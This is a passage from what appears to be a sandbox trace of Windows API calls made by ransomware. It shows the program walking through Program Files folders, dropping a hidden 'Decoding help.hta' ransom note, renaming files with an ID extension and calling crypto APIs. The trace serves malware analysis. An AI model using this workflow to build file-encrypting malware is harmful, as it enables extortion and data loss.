Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.523] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a01d5b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84a01d5b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x38cff457, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x61bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5.png", cAlternateFileName="")) returned 1 [0061.523] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.523] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.523] lstrcmpiW (lpString1="Decoding help.hta", lpString2="5.png") returned 1 [0061.523] lstrlenW (lpString="5.png") returned 5 [0061.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.523] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 76 [0061.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="5.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" [0061.523] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" [0061.523] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.525] FindNextFileW (in: hFindFile=0x245588e8, lpFindFileData=0x27c1fd30 | out: lpFindFileData=0x27c1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a01d5b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x84a01d5b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x39103941, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="6.png", cAlternateFileName="")) returned 1 Thread: id = 993 os_tid = 0xd50 [0060.279] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*", lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812df993, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812df993, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245588a8 [0060.279] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.279] FindNextFileW (in: hFindFile=0x245588a8, lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812df993, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812df993, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.280] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.280] FindNextFileW (in: hFindFile=0x245588a8, lpFindFileData=0x289dfd30 | out: lpFindFileData=0x289dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x812df993, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7c36dac1, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7c36dac1, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1632, dwReserved0=0x0, dwReserved1=0x0, cFileName="FrameworkList.xml", cAlternateFileName="FRAMEW~1.XML")) returned 1 [0060.280] lstrcpyW (in: lpString1=0x10f1ceb0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" [0060.280] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned 87 [0060.280] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta" [0060.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\decoding help.hta")) returned 0xffffffff [0060.280] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.510] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x289dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x289dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.510] CloseHandle (hObject=0xd3c) returned 1 [0061.510] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.511] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FrameworkList.xml") returned -1 [0061.511] lstrlenW (lpString="FrameworkList.xml") returned 17 [0061.511] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*" [0061.511] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\*.*") returned 87 [0061.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\", lpString2="FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" [0061.511] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" [0061.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0061.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\RedistList\\FrameworkList.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\redistlist\\frameworklist.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.512] CreateFileMappingA (hFile=0xd3c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd64 [0061.512] CryptAcquireContextA (phProv=0x289dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 994 os_tid = 0xdf0 [0060.281] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*", lpFindFileData=0x2b7afd30 | out: lpFindFileData=0x2b7afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812df993, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812df993, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558928 [0060.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.281] FindNextFileW (in: hFindFile=0x24558928, lpFindFileData=0x2b7afd30 | out: lpFindFileData=0x2b7afd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x812df993, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x812df993, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.281] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.281] FindNextFileW (in: hFindFile=0x24558928, lpFindFileData=0x2b7afd30 | out: lpFindFileData=0x2b7afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5647fd36, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x5647fd36, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x754cb2bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xda7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client.xml", cAlternateFileName="")) returned 1 [0060.281] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*" [0060.281] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*") returned 87 [0060.281] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Decoding help.hta" [0060.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\decoding help.hta")) returned 0xffffffff [0060.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa70 [0061.515] WriteFile (in: hFile=0xa70, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2b7afcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2b7afcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.516] CloseHandle (hObject=0xa70) returned 1 [0061.516] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.516] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Client.xml") returned 1 [0061.516] lstrlenW (lpString="Client.xml") returned 10 [0061.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*" [0061.516] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\*.*") returned 87 [0061.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\", lpString2="Client.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml" [0061.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml" [0061.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0061.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\client.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\SubsetList\\Client.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.0\\subsetlist\\client.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.517] FindNextFileW (in: hFindFile=0x24558928, lpFindFileData=0x2b7afd30 | out: lpFindFileData=0x2b7afd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5647fd36, ftCreationTime.dwHighDateTime=0x1ca03fe, ftLastAccessTime.dwLowDateTime=0x5647fd36, ftLastAccessTime.dwHighDateTime=0x1ca03fe, ftLastWriteTime.dwLowDateTime=0x754cb2bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xda7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client.xml", cAlternateFileName="")) returned 0 [0061.517] FindClose (in: hFindFile=0x24558928 | out: hFindFile=0x24558928) returned 1 Thread: id = 995 os_tid = 0xd54 [0060.283] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*", lpFindFileData=0x2b8efd30 | out: lpFindFileData=0x2b8efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22e64bc5, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x24558968 [0060.285] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.285] FindNextFileW (in: hFindFile=0x24558968, lpFindFileData=0x2b8efd30 | out: lpFindFileData=0x2b8efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22e64bc5, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.285] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.285] FindNextFileW (in: hFindFile=0x24558968, lpFindFileData=0x2b8efd30 | out: lpFindFileData=0x2b8efd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22e64bc5, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0060.285] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0060.285] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0060.285] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0060.285] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0060.285] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned 70 [0060.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css" [0060.286] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\css\\*.*" [0060.286] GlobalMemoryStatus (in: lpBuffer=0x2b8efd10 | out: lpBuffer=0x2b8efd10) [0060.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5cf0528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x714 [0063.862] CloseHandle (hObject=0x714) returned 1 [0063.862] FindNextFileW (in: hFindFile=0x24558968, lpFindFileData=0x2b8efd30 | out: lpFindFileData=0x2b8efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x86a, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.html", cAlternateFileName="")) returned 1 Thread: id = 996 os_tid = 0xe08 [0060.284] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*", lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8061433b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8061433b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245589a8 [0060.288] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.288] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8061433b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8061433b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.289] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.289] FindNextFileW (in: hFindFile=0x245589a8, lpFindFileData=0x2ba2fd30 | out: lpFindFileData=0x2ba2fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce029cd, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x3ce029cd, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x3ce029cd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x0, dwReserved1=0x0, cFileName="16-on-black.gif", cAlternateFileName="")) returned 1 [0060.289] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" | 